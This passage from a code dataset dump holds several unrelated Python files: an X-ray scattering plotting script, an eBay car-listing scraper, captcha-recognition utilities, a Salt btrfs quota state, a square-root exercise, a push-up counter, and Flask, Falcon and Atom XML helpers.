ax = plt.gca()\n divider = make_axes_locatable(ax)\n cax = divider.append_axes(\"right\", size=\"5%\", pad=0.05)\n else:\n plt.axes([0, 0, 1, 1]) # Make the plot occupy the whole canvas\n plt.axis('off')\n if log:\n image_filename = basename + '_log.png'\n im = plt.imshow(dset,norm=LogNorm())\n else:\n image_filename = basename + '.png'\n im = plt.imshow(dset)\n\n if cbar:\n plt.colorbar(im, cax=cax)\n \n plt.savefig(image_filename, dpi=100)\n\n\ndef plot_pixelSum(xpcs_h5file):\n pixelSum_dset = xpcs_h5file['exchange/pixelSum']\n basename = 'scattering_pattern'\n gen_image(pixelSum_dset, basename, log=True)\n gen_image(pixelSum_dset, basename + '_lin', cbar=False)\n # Old scattering images Suresh 
doesn't want anymore. Uncomment to begin generating again\n # gen_image(pixelSum_dset, basename)\n # gen_image(pixelSum_dset, basename + '_pre', cbar=False, log=True)\n\n\ndef plot_intensity_vs_time(xpcs_h5file):\n i_vs_t = xpcs_h5file['exchange/frameSum']\n pylab.plot(i_vs_t[0], i_vs_t[1])\n plt.xlabel(\"Elapsed Time (s)\")\n plt.ylabel(\"Average Intensity (photons/pixel/frame)\")\n plt.title(xpcs_h5file.filename.rstrip('.hdf'))\n plt.savefig('total_intensity_vs_time.png')\n\n\ndef plot_intensity_t_vs_q(xpcs_h5file):\n basename = os.path.basename(xpcs_h5file.filename).rstrip('.hdf')\n q = xpcs_h5file['/xpcs/sqlist']\n pmt_t = xpcs_h5file['/exchange/partition-mean-partial']\n markers = ['o', 'x', '+', 'v', '^', '<', '>', 's', 'p', '*', 'h',\n 'D']\n n_markers = len(markers)\n n_plots = pmt_t.shape[0]\n fig = plt.figure()\n fig.set_size_inches((8,6.25))\n ax = plt.gca()\n for i in range(0, n_plots):\n if i >= n_markers:\n markerfacecolor = 'gray'\n i_marker = i - n_markers\n else:\n markerfacecolor = 'None'\n i_marker = i\n ax.plot(q[0], pmt_t[i], color='k', marker=markers[i_marker],\n alpha=0.5,\n markerfacecolor=markerfacecolor,\n markeredgecolor='k',\n markersize=4,\n markeredgewidth=0.3,\n linestyle = 'None',\n label='{:d}'.format(i+1))\n ax.set_yscale('log')\n ax.set_xscale('log')\n ax.set_xlabel(\"q (A^-1)\")\n ax.set_ylabel(\"Intensity (photons/pixel/frame)\")\n ax.legend(numpoints=1)\n plt.title('{} Intensity Mean Partial'.format(basename))\n plt.tight_layout()\n plt.savefig('{}_intensity_t.png'.format(basename), dpi=150)\n\ndef plot_intensity_vs_q(xpcs_h5file):\n basename = os.path.basename(xpcs_h5file.filename).rstrip('.hdf')\n q = xpcs_h5file['/xpcs/sqlist']\n pmt = xpcs_h5file['/exchange/partition-mean-total']\n fig = plt.figure()\n fig.set_size_inches((8,6.25))\n plt.loglog(q[0], pmt[0], color='k')\n plt.xlabel(\"q (A^-1)\")\n plt.ylabel(\"Intensity (photons/pixel/frame)\")\n plt.title('{} Intensity Mean Total'.format(basename))\n plt.tight_layout()\n plt.savefig(basename + '_intensity.png', dpi=150)\n\n\ndef plot_g2_all(xpcs_h5file):\n def sfig(bn, gs, ge):\n fig.suptitle('{} Correlations g2 {:d} to {:d}'.format(bn, gs, ge))\n plt.savefig('{}_g2_corr_{:03d}_{:03d}.png'.format(bn, gs, ge), dpi=100)\n \n basename = os.path.basename(xpcs_h5file.filename).rstrip('.hdf')\n exp = xpcs_h5file['/measurement/instrument/detector/exposure_period']\n dt = xpcs_h5file['/exchange/tau'][0]*exp[0][0]\n g2_all = xpcs_h5file['/exchange/norm-0-g2']\n g2_err_all = xpcs_h5file['/exchange/norm-0-stderr']\n dynamicQ = xpcs_h5file['/xpcs/dqlist'][0]\n n_plots = dynamicQ.shape[0]\n\n g_index = 0\n while g_index < n_plots:\n g_start = g_index\n pylab.clf()\n fig, axs = plt.subplots(nrows=3, ncols=3, constrained_layout=True)\n fig.set_size_inches((10,10.25))\n for i in range(0, 3): # x, left-right axis\n for j in range(0, 3): # y, top-down axis\n ax = axs[i,j]\n ax.errorbar(dt, g2_all[:, g_index], yerr=g2_err_all[:, g_index],\n fmt='ko', fillstyle='none', capsize=2, markersize=5)\n ax.set_title('q={:f}'.format(dynamicQ[g_index]))\n ax.set_yscale('linear')\n ax.set_xscale('log')\n g_index += 1\n if g_index == n_plots:\n sfig(basename, g_start, g_index - 1)\n break\n sfig(basename, g_start, g_index - 1)\n\ndef plot_g2_all_fit(xpcs_h5file):\n def sfig(bn, gs, ge):\n fig.suptitle('{} Correlation Fitting Result'.format(bn))\n plt.savefig('{}_g2_corr_fit{:03d}_{:03d}.png'.format(bn, gs, ge), dpi=100)\n \n basename = os.path.basename(xpcs_h5file.filename).rstrip('.hdf')\n exp = 
xpcs_h5file['/measurement/instrument/detector/exposure_period']\n dt = xpcs_h5file['/exchange/tau'][0]*exp[0][0]\n g2_all = xpcs_h5file['/exchange/norm-0-g2']\n g2_err_all = xpcs_h5file['/exchange/norm-0-stderr']\n g2_fit1_all = xpcs_h5file['/exchange/g2avgFIT1'][:,0,:]\n g2_fit2_all = xpcs_h5file['/exchange/g2avgFIT2'][:,0,:]\n dynamicQ = xpcs_h5file['/xpcs/dqlist'][0]\n n_plots = dynamicQ.shape[0]\n\n g_index = 0\n while g_index < n_plots:\n g_start = g_index\n pylab.clf()\n fig, axs = plt.subplots(nrows=3, ncols=3, constrained_layout=True)\n fig.set_size_inches((10,10.25))\n for i in range(0, 3): # x, left-right axis\n for j in range(0, 3): # y, top-down axis\n ax = axs[i,j]\n ax.plot(dt, g2_fit1_all[:, g_index], 'b')\n ax.plot(dt, g2_fit2_all[:, g_index], 'r')\n ax.errorbar(dt, g2_all[:, g_index], yerr=g2_err_all[:, g_index],\n fmt='ko', fillstyle='none', capsize=2, markersize=5)\n ax.set_title('q={:f}'.format(dynamicQ[g_index]))\n ax.set_yscale('linear')\n ax.set_xscale('log')\n g_index += 1\n if g_index == n_plots:\n sfig(basename, g_start, g_index - 1)\n break\n sfig(basename, g_start, g_index - 1)\n\ndef plot_fits(xpcs_h5file):\n \n basename = os.path.basename(xpcs_h5file.filename).rstrip('.hdf')\n\n x = xpcs_h5file['/xpcs/dqlist'][0]\n\n c1 = xpcs_h5file['exchange/contrastFIT1'][0]\n c2 = xpcs_h5file['exchange/contrastFIT2'][0]\n c1_err = xpcs_h5file['exchange/contrastErrFIT1'][0]\n c2_err = xpcs_h5file['exchange/contrastErrFIT2'][0]\n \n b1 = xpcs_h5file['exchange/baselineFIT1'][0]\n b2 = xpcs_h5file['exchange/baselineFIT2'][0]\n b1_err = xpcs_h5file['exchange/baselineErrFIT1'][0]\n b2_err = xpcs_h5file['exchange/baselineErrFIT2'][0]\n\n tau1 = xpcs_h5file['exchange/tauFIT1'][0]\n tau2 = xpcs_h5file['exchange/tauFIT2'][0]\n tau1_err = xpcs_h5file['exchange/tauErrFIT1'][0]\n tau2_err = xpcs_h5file['exchange/tauErrFIT2'][0]\n\n exp2 = xpcs_h5file['exchange/exponentFIT2'][0]\n exp2_err = xpcs_h5file['exchange/exponentErrFIT2'][0]\n\n fig, axs = plt.subplots(nrows=2, ncols=2, constrained_layout=True)\n fig.set_size_inches((10,10.25))\n \n ax = axs[0,0]\n ax.errorbar(x, c1, yerr=c1_err,\n fmt='bo', fillstyle='none',\n capsize=2, markersize=5, label='Simple Exp')\n ax.errorbar(x, c2, yerr=c2_err,\n fmt='ro', fillstyle='none',\n capsize=2, markersize=5, label='Stretched Exp')\n ax.set_xlabel(\"q (A^-1)\")\n ax.set_ylabel(\"Contrast\")\n ax.set_yscale('linear')\n ax.set_xscale('log') \n ax.set_ylim([-0.5, 1])\n ax.legend(numpoints=1)\n \n ax = axs[0,1]\n ax.errorbar(x, b1, yerr=b1_err,\n fmt='bo', fillstyle='none',\n capsize=2, markersize=5, label='Simple Exp')\n ax.errorbar(x, b2, yerr=b2_err,\n fmt='ro', fillstyle='none',\n capsize=2, markersize=5, label='Stretched Exp')\n ax.set_xlabel(\"q (A^-1)\")\n ax.set_ylabel(\"Baseline\")\n ax.set_yscale('linear')\n ax.set_xscale('log') \n ax.legend(numpoints=1)\n\n ax = axs[1,1]\n ax.errorbar(x, tau1, yerr=tau1_err,\n fmt='bo', fillstyle='none',\n capsize=2, markersize=5, label='Simple Exp')\n ax.errorbar(x, tau2, yerr=tau2_err,\n fmt='ro', fillstyle='none',\n capsize=2, markersize=5, label='Stretched Exp')\n ax.set_xlabel(\"q (A^-1)\")\n ax.set_ylabel(\"Tau (sec)\")\n ax.set_yscale('log')\n ax.set_xscale('log') \n ax.legend(numpoints=1)\n\n ax = axs[1,0]\n ax.errorbar(x, exp2, yerr=exp2_err,\n fmt='ro', fillstyle='none',\n capsize=2, markersize=5, label='Stretched Exp')\n ax.set_xlabel(\"q (A^-1)\")\n ax.set_ylabel(\"Stretching Exponent\")\n ax.set_yscale('linear')\n ax.set_xscale('log') \n ax.set_ylim([0, 2.25])\n ax.legend(numpoints=1)\n \n 
fig.suptitle('{} Correlation Fitting Parameters'.format(basename))\n plt.savefig('{}_corr_params.png'.format(basename), dpi=100)\n\n\ndef make_plots(h5filename):\n print('opening ' + h5filename)\n x_h5_file = h5py.File(h5filename, 'r')\n error_log = 'plot_errors.log'\n for xplot in (plot_intensity_vs_time, plot_intensity_vs_q, plot_intensity_t_vs_q,\n plot_g2_all, plot_g2_all_fit, plot_pixelSum, plot_fits):\n try:\n xplot(x_h5_file)\n plt.close('all') #why does it need this?\n except Exception as e:\n with open(error_log, 'w+') as f:\n f.write(f'Error Plotting {xplot.__name__}: {str(e)}')\n\nif __name__ == '__main__':\n make_plots(sys.argv[1])","sub_path":"gladier_xpcs/tools/xpcs_plots.py","file_name":"xpcs_plots.py","file_ext":"py","file_size_in_byte":10315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"151745591","text":"# scrapes completed listings for Ford Mustangs\n\nimport scrapy\n\n\nclass EbaySpider(scrapy.Spider):\n name = 'ebay_motors4'\n\n custom_settings = {\n \"DOWNLOAD_DELAY\": 1,\n \"CONCURRENT_REQUESTS_PER_DOMAIN\": 8,\n \"HTTPCACHE_ENABLED\": True\n }\n\n# completed sales, no zip code specified\n start_urls = [\n 'https://www.ebay.com/sch/Cars-Trucks/6001/i.html?makeval=Ford&modelval=Mustang&_nkw=Ford%20Mustang&LH_Complete=1&LH_Sold=1&rt=nc&_trksid=p2045573.m1684'\n ]\n\n\n def parse(self, response):\n # Extract links to each car listing\n for href in response.xpath(\n '//h3[@class=\"lvtitle\"]/a/@href'\n ).extract():\n # For each car link, call 'parse_car' (defined later)\n yield scrapy.Request(\n url=href,\n callback=self.parse_car,\n meta={'url': href}\n )\n # Follow pagination links and repeat\n next_url = response.xpath(\n '//td[@class=\"pagn-next\"]/a/@href'\n ).extract()[0]\n\n yield scrapy.Request(\n url=next_url,\n callback=self.parse\n )\n\n def parse_car(self, response):\n\n title = response.xpath('//h1/text()').extract()\n\n subtitle = [subtl.strip() for subtl in response.xpath('//h2[@class=\"it-sttl\"]/text()').extract()]\n\n winningbid = response.xpath('//div[@class=\"u-flL w29 vi-price-np\"]/span[@id]/text()').extract()\n buy_it_now_price = [bin.strip() for bin in response.xpath('//div[@class=\"u-flL w29 vi-price\"]/span[@id]/text()').extract()]\n\n num_bids = response.xpath('//a[@class=\"vi-bidC\"]/span/text()').extract_first()\n\n url = response.request.meta['url']\n\n catsvals = [catval.strip() for catval in response.xpath('//div[@class=\"section\"]//tr//text()').extract()]\n\n yield {\n 'title': title,\n 'subtitle' : subtitle,\n 'winningbid' : winningbid,\n 'buy_it_now_price':buy_it_now_price,\n 'num_bids' : num_bids,\n 'url': url,\n 'catsvals': catsvals\n }\n\n \n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"web_scraping/mustang_spider.py","file_name":"mustang_spider.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"564348552","text":"import random\nimport os\n\nfrom captcha.image import ImageCaptcha\nimport numpy as np\nfrom PIL import Image\n\nCHARACTERS = \"\".join([chr(i) for i in range(48, 58)] + [chr(i) for i in range(97, 123)] + [chr(i) for i in range(65, 91)])\n\n\ndef captcha_image_generator(\n batch_size=64,\n height=70,\n width=160,\n n_class=62,\n characters=CHARACTERS,\n char_num=4,\n font_sizes=(46,)\n ):\n X = np.zeros((batch_size, height, width, 3), dtype=np.uint8)\n y = [np.zeros((batch_size, n_class), dtype=np.uint8) for i in range(char_num)]\n generator = ImageCaptcha(width=width, 
height=height, font_sizes=font_sizes)\n while True:\n for i in range(batch_size):\n random_str = ''.join([random.choice(characters) for j in range(char_num)])\n image = generator.generate_image(random_str)\n X[i] = image\n for j, ch in enumerate(random_str):\n y[j][i, :] = 0\n y[j][i, characters.find(ch)] = 1\n yield X, y\n\n\ndef vectors_to_labels(y, chars=CHARACTERS):\n '''\n convert the one hot vector to string labels\n :param y: one hot vector with shape(char num, size of example, n_class)\n :param chars:\n :return:\n '''\n index = np.argmax(np.array(y), axis=2)\n char_num, m = index.shape\n return [''.join(chars[index[i][k]] for i in range(char_num)) for k in range(m)]\n\n\ndef evaluate_by_generator(generator, model, steps=10):\n '''\n evaluate the model by generator\n :param generator:\n :param model:\n :param steps:\n :return: accuracy\n '''\n success = 0\n total = 0\n for i in range(steps):\n X, y = next(generator)\n predicts = vectors_to_labels(model.predict(X))\n labels = vectors_to_labels(y)\n m = X.shape[0]\n for j in range(m):\n if predicts[j].lower() == labels[j].lower():\n success += 1\n total += 1\n\n return success * 1.0 / total\n\ndef evaluate_by_files(folder, model, height, width, chars=CHARACTERS):\n success = 0\n labels = []\n X = []\n for file in os.listdir(folder):\n file_path = os.path.join(folder, file)\n image = Image.open(file_path).convert(\"RGB\").resize((width, height))\n x = np.array(image, dtype=np.uint8)\n labels.append(file[:4])\n X.append(x)\n total = len(labels)\n X = np.array(X, dtype=np.uint8)\n predicts = model.predict(X)\n predict_labels = vectors_to_labels(predicts, chars)\n for i in range(total):\n if labels[i].lower() == predict_labels[i].lower():\n success += 1\n return success * 1.0 / total\n\n\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"347182191","text":"# -*- coding: utf-8 -*-\r\n'''\r\nState to add or remove quota\r\n\r\n'''\r\n# Import python libs\r\nfrom __future__ import absolute_import\r\nimport logging\r\n\r\nlog = logging.getLogger(__name__)\r\n\r\ndef present(name, size):\r\n ret = { \r\n 'name': name,\r\n 'size': size,\r\n 'oldsize': '', \r\n 'changes': {}, \r\n 'result': True, \r\n 'comment': 'The quota {0} is present in {1}'.format(size, name) \r\n }\r\n \r\n\r\n if __salt__['btrfs.check_quota'](name):\r\n #Get actual size\r\n ret['oldsize'] = __salt__['btrfs.get_size'](name).rstrip('iB').replace('.00', '')\r\n\r\n if __opts__['test']:\r\n #Check if the size that's set matches the size you want to set\r\n if size == ret['oldsize']:\r\n #Change a few values in the dictionary\r\n ret['comment'] = 'The quota on {0} is set to {1}'.format(name, size)\r\n \r\n else:\r\n #Change a few values in the dictionary\r\n ret['comment'] = 'The quota on {0} would have changed from {1} to {2}'.format(name, ret['oldsize'], size)\r\n ret['result'] = None\r\n \r\n return ret\r\n\r\n #Check if the size that's set matches the size you want to set\r\n if size == ret['oldsize']:\r\n ret['comment'] = 'The quota on {0} is set to {1}'.format(name, size)\r\n\r\n else:\r\n #Check if the size you want to set is none\r\n if size == 'none':\r\n #Execute the module btrfs.remove_quota\r\n ret['result'] = __salt__['btrfs.remove_quota'](name)\r\n else:\r\n #Execute the module btrfs.set_quota\r\n ret['result'] = __salt__['btrfs.set_quota'](name, size)\r\n \r\n\r\n ret['changes'].update({'diff': {'old': ret['oldsize'],'new': size}}) \r\n 
ret['comment'] = 'The quota on {0} has changed from {1} to {2}'.format(name, ret['oldsize'], size)\r\n\r\n return ret\r\n else:\r\n ret['comment'] = 'The quota is disabled'\r\n ret['result'] = False\r\n\r\n return ret\r\n\r\n\r\ndef enabled_quota(name):\r\n ret = { \r\n 'name': name,\r\n 'enabled': '', \r\n 'changes': {}, \r\n 'result': True, \r\n 'comment': 'Quota is enabled on {0}'.format(name) \r\n }\r\n\r\n ret['enabled'] = __salt__['btrfs.check_quota'](name)\r\n\r\n if __opts__['test']:\r\n\r\n if not ret['enabled']:\r\n ret['comment'] = 'The quota would have been enabled on {0}'.format(name)\r\n ret['result'] = None\r\n else:\r\n ret['comment'] = 'The quota is already enabled on {0}'.format(name)\r\n\r\n return ret\r\n \r\n\r\n if not ret['enabled']:\r\n ret['comment'] = 'The quota is now enabled. You can set quotas on {0}'.format(name)\r\n ret['result'] = __salt__['btrfs.enable_quota'](name)\r\n else:\r\n ret['comment'] = 'The quota is already enabled on {0}'.format(name)\r\n\r\n return ret\r\n\r\ndef disabled_quota(name):\r\n ret = { \r\n 'name': name,\r\n 'disabled': '', \r\n 'changes': {}, \r\n 'result': True, \r\n 'comment': 'Quota is disabled on {0}'.format(name) \r\n }\r\n\r\n ret['disabled'] = __salt__['btrfs.check_quota'](name)\r\n\r\n if __opts__['test']:\r\n\r\n if ret['disabled']:\r\n ret['comment'] = 'The quota would have been disabled on {0}'.format(name)\r\n ret['result'] = None\r\n else:\r\n ret['comment'] = 'The quota is already disabled on {0}'.format(name)\r\n\r\n return ret\r\n \r\n\r\n if ret['disabled']:\r\n ret['comment'] = 'The quota is now disabled on {0}'.format(name)\r\n ret['result'] = __salt__['btrfs.disable_quota'](name)\r\n else:\r\n ret['comment'] = 'The quota is already disabled on {0}'.format(name)\r\n\r\n return ret","sub_path":"btrfs_quota_state.py","file_name":"btrfs_quota_state.py","file_ext":"py","file_size_in_byte":3449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"487610596","text":"\"\"\"\nImplement int sqrt(int x).\n\nCompute and return the square root of x.\n\nx is guaranteed to be a non-negative integer.\n\nExample 1:\n\nInput: 4\nOutput: 2\nExample 2:\n\nInput: 8\nOutput: 2\nExplanation: The square root of 8 is 2.82842...,\nand since we want to return an integer, the decimal part will be truncated.\n\"\"\"\n\n\nclass Solution(object):\n def mySqrt(self, x):\n \"\"\"\n :type x: int\n :rtype: int\n \"\"\"\n if x < 2:\n return x\n\n i = 1\n j = x // 2\n while i <= j:\n mid = (i + j) // 2\n sqrt = mid * mid\n\n if sqrt == x:\n return mid\n\n if sqrt < x:\n i = mid + 1\n else:\n j = mid - 1\n\n return j\n\n\n# Newton's method\nclass Solution2(object):\n def mySqrt(self, x):\n \"\"\"\n :type x: int\n :rtype: int\n \"\"\"\n res = x\n while res * res > x:\n res = int(1. * res / 2 + 1. 
* x / (2 * res))\n return res\n\n\nif __name__ == '__main__':\n mySol = Solution()\n x = 8\n print('input: %s' % x)\n print('output: %s' % mySol.mySqrt(x))\n","sub_path":"python/sqrt_x.py","file_name":"sqrt_x.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"571517333","text":"# import necessary modules\nfrom adafruit_circuitplayground import cp\nfrom digitalio import DigitalInOut, Direction, Pull\nimport time\nimport board\nimport neopixel\nimport adafruit_hcsr04\n\n# variables assigned for sonar sensor\nsonar = adafruit_hcsr04.HCSR04(trigger_pin=board.A3, echo_pin=board.A2)\n\n# function to find pattern\ndef find_array_pattern(data, pattern):\n count = 0\n for i in range(len(data)-len(pattern)+1):\n tmp = [data[i], data[i+1]]\n\n try:\n for j in range(len(data)-i):\n #print(i, i+j)\n if tmp[-1] != data[i+j+1]:\n tmp.append(data[i+j+1])\n\n if len(tmp) == len(pattern):\n #print(tmp)\n break\n except:\n pass\n\n if tmp == pattern:\n count += 1\n\n return count\n\n\n# loop this forEVER\nwhile True:\n\n # variable declarations for the pushup loop\n pushup_counter = 0\n moveRecord = []\n\n # actual distance loop\n while True:\n print('looping loop')\n #print(moveRecord)\n\n if find_array_pattern(moveRecord, [1,2,1]) == 1:\n pushup_counter += 1\n moveRecord = []\n\n print('Number of push-ups: ', pushup_counter)\n\n\n # print distance value in cm\n # in push-up posture, the distance from upper body to the ground is approx. 37~40cm\n try:\n sonar_distance = sonar.distance\n # if in runtime error, make neopixel orange\n except RuntimeError:\n print(\"Runtime Error\")\n continue\n\n\n # print('the distance is: ', sonar_distance, 'cm')\n # if distance is bigger than 25cm, make neopixel red\n if sonar_distance >= 25:\n cp.pixels[0] = (255, 0, 0)\n\n passing = True\n print('Going down')\n #time.sleep(1)\n moveRecord.append(1)\n\n # if in the process of push-up, blink with yellow\n elif sonar_distance < 25 and sonar_distance > 10:\n cp.pixels[0] = (255, 150, 0)\n\n print('Not there yet')\n #time.sleep(1)\n\n\n # if distance is less than 10cm, make neopixel teal\n elif sonar_distance <= 10:\n cp.pixels[0] = (0, 255, 50)\n\n print('Go up!')\n moveRecord.append(2)\n\n time.sleep(0.25)\n","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":2318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"330009669","text":"import numpy as np\nimport argparse\nimport time\nimport cv2\nimport os\n\n\nif __name__ == \"__main__\":\n # Capture video from webcam (the 0th index is the webcam)\n try:\n\n capture = cv2.VideoCapture(0)\n\n except:\n \n print(\"Error - cannot access webcam\")\n \n while True:\n\n # _ makes the interpreter ignore the return\n\n _ , frame = capture.read()\n frame = cv2.rotate(frame, cv2.ROTATE_90_CLOCKWISE)\n\n cv2.imshow('Capture', frame)\n\n key = cv2.waitKey(1)\n if key == 27:\n break\n \n \n \n\n \n\n\n","sub_path":"scripts/camera_test.py","file_name":"camera_test.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"386707977","text":"import os, sys\n\nparent_dir = os.path.abspath(os.path.join(os.getcwd(), \"..\"))\nsys.path.append(parent_dir)\nsys.path.append(os.getcwd())\n\nfrom server import create_app\n\napp = create_app()\n\napp.run(debug=True, threaded=True, host='127.0.0.1', 
port=5000)\n","sub_path":"app/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"158916280","text":"# Copyright 2014-2015 Clione Software and Havas Worldwide London\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may not\n# use this file except in compliance with the License. You may obtain a copy\n# of the License at http:#www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport json\n\nimport falcon\n\nfrom sikre import settings\nfrom sikre.models.users import User\nfrom sikre.models.items import ItemGroup, Item\nfrom sikre.models.services import Service\n\n\nclass DetailService(object):\n\n \"\"\"\n This resource handles the /services/ url.\n \"\"\"\n def on_get(self, req, res, id):\n # Get the data\n try:\n payload = []\n service = Service.get(Service.id == id)\n\n # Get all the services and organize them\n services_dict = {}\n services_dict[\"url\"] = service.url\n services_dict[\"username\"] = service.username\n services_dict[\"password\"] = service.password\n payload.append(services_dict)\n\n res.status = falcon.HTTP_200\n res.body = json.dumps(payload)\n except Exception as e:\n print(e)\n error_msg = (\"Unable to get the items. Please try again later\")\n raise falcon.HTTPServiceUnavailable(title=\"{0} failed\".format(req.method),\n description=error_msg,\n retry_after=30,\n href=settings.__docs__)\n\n def on_post(self, req, res, id):\n pass\n\n def on_put(self, req, res, id):\n raise falcon.HTTPError(falcon.HTTP_405,\n title=\"Client error\",\n description=\"{0} method not allowed.\".format(req.method),\n href=settings.__docs__)\n\n def on_update(self, req, res, id):\n raise falcon.HTTPError(falcon.HTTP_405,\n title=\"Client error\",\n description=\"{0} method not allowed.\".format(req.method),\n href=settings.__docs__)\n\n def on_delete(self, req, res, id):\n raise falcon.HTTPError(falcon.HTTP_405,\n title=\"Client error\",\n description=\"{0} method not allowed.\".format(req.method),\n href=settings.__docs__)\n\n\nclass Services(object):\n\n def on_get(self, req, res):\n \"\"\"\n Handle the GET request, returning a list of the items that the user\n has access to.\n\n First we create an empty dictionary and query the database to get\n all the item objects. After that, we iterate over the objects to\n populate the dictionary. 
In the end we return a 200 code to the browser\n and return the results dictionary wrapped in a list like the ReST\n standard says.\n \"\"\"\n raise falcon.HTTPError(falcon.HTTP_405,\n title=\"Client error\",\n description=\"{0} method not allowed.\".format(req.method),\n href=settings.__docs__)\n\n def on_post(self, request, response, pk):\n pass\n\n def on_put(self, request, response, pk):\n raise falcon.HTTPError(falcon.HTTP_405,\n title=\"Client error\",\n description=\"{0} method not allowed.\".format(request.method),\n href=settings.__docs__)\n\n def on_update(self, request, response):\n raise falcon.HTTPError(falcon.HTTP_405,\n title=\"Client error\",\n description=\"{0} method not allowed.\".format(request.method),\n href=settings.__docs__)\n\n def on_delete(self, request, response):\n raise falcon.HTTPError(falcon.HTTP_405,\n title=\"Client error\",\n description=\"{0} method not allowed.\".format(request.method),\n href=settings.__docs__)\n","sub_path":"sikre/resources/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":4423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"521742808","text":"try:\n from xml.etree.ElementTree import fromstring, tostring, SubElement\n import xml.etree.ElementTree as ElementTree\nexcept:\n from elementtree.ElementTree import fromstring, tostring, SubElement\n import elementtree.ElementTree as ElementTree\n\nclass namespace(object):\n def __init__(self, uri):\n self.ns_uri = uri\n self.memoized = {}\n\n def __call__(self, element):\n if element not in self.memoized:\n self.memoized[element] = \"{%s}%s\" % (self.ns_uri, element)\n return self.memoized[element]\n\n\nATOM = namespace(\"http://www.w3.org/2005/Atom\")\nAPP = namespace(\"http://www.w3.org/2007/app\")\nXHTML = namespace(\"http://www.w3.org/1999/xhtml\")\n\nmy_namespaces = {\n \"http://www.w3.org/1999/xhtml\": \"xhtml\",\n \"http://www.w3.org/2007/app\" : \"app\",\n \"http://www.w3.org/2005/Atom\" : \"atom\"\n }\n\nElementTree._namespace_map.update(my_namespaces)\n\nimport re\nfrom urlparse import urljoin\nfrom xml.sax.saxutils import quoteattr, escape\nimport time\nimport calendar\n\n\ndef get_element(etree, name):\n value = \"\"\n if '}' not in name:\n name = ATOM(name)\n l = etree.findall(name)\n if l:\n value = l[0].text\n return value\n\nRFC3339 = re.compile(\"^(?P<year>\\d\\d\\d\\d)-(?P<month>\\d\\d)-(?P<day>\\d\\d)T(?P<hour>\\d\\d):(?P<minute>\\d\\d):(?P<second>\\d\\d)(\\.\\d*)?\" +\n \"(?P<timezone>Z|((?P<tzhour>[+-]\\d\\d):\\d\\d))$\") \n\ndef get_date(etree, name):\n \"\"\"\n Returns the Date Construct value as seconds from the epoch\n in UTC. The 'name' should be the element name of an\n RFC 4287 Date Construct, such as ATOM('published'), ATOM('updated')\n or APP('edited'). The parameter 'etree' is an elementtree\n element. 
Note that you don't need to add the namespace\n to elements in the ATOM namespace.\n \"\"\"\n date = get_element(etree, name)\n m = RFC3339.search(date)\n if not m:\n raise ValueError(\"Not a valid RFC 3339 format.\")\n d = m.groupdict()\n ndate = [int(x) for x in [d['year'], d['month'], d['day'], d['hour'], d['minute'], d['second']]]\n ndate.append(0) # weekday\n ndate.append(1) # year day\n if d['timezone'] != 'Z':\n ndate[3] -= int(d['tzhour'])\n ndate.append(0)\n return calendar.timegm(tuple(ndate))\n \n\ndef serialize_nons(element, top):\n tag = element.tag.split(\"}\", 1)[1]\n tail = u\"\"\n if element.tail != None:\n tail = escape(element.tail)\n text = u\"\"\n if element.text != None:\n text = element.text\n attribs = \" \".join([\"%s=%s\" % (k, quoteattr(v)) for k, v in element.attrib.iteritems()])\n if attribs:\n attribs = \" \" + attribs\n if top:\n value = escape(text)\n close = u\"\"\n else:\n value = \"<%s%s>%s\" % (tag, attribs, escape(text))\n close = \"</%s>\" % tag\n if value == None:\n value = u\"\"\n \n return value + \"\".join([serialize_nons(c, False) for c in element.getchildren()]) + close + tail\n \n\ndef get_text(name, entry):\n value = \"\"\n texttype = \"text\"\n l = entry.findall(ATOM(name))\n if l:\n value = l[0].text\n texttype = mime2atom(l[0].get('type', 'text'))\n if texttype in [\"text\", \"html\"]:\n pass\n elif texttype == \"xhtml\":\n div = l[0].find(\"{http://www.w3.org/1999/xhtml}div\")\n value = serialize_nons(div, True)\n else:\n value = \"\"\n if value == None:\n value = \"\"\n return (texttype, value)\n\n\ndef set_text(entry, name, ttype, value):\n elements = entry.findall(ATOM(name))\n if not elements:\n element = SubElement(entry, ATOM(name))\n else:\n element = elements[0]\n element.set('type', ttype)\n [element.remove(e) for e in element.getchildren()]\n if ttype in [\"html\", \"text\"]:\n element.text = value\n elif ttype == \"xhtml\":\n element.text = \"\"\n try:\n div = fromstring((u\"<div xmlns='http://www.w3.org/1999/xhtml'>%s</div>
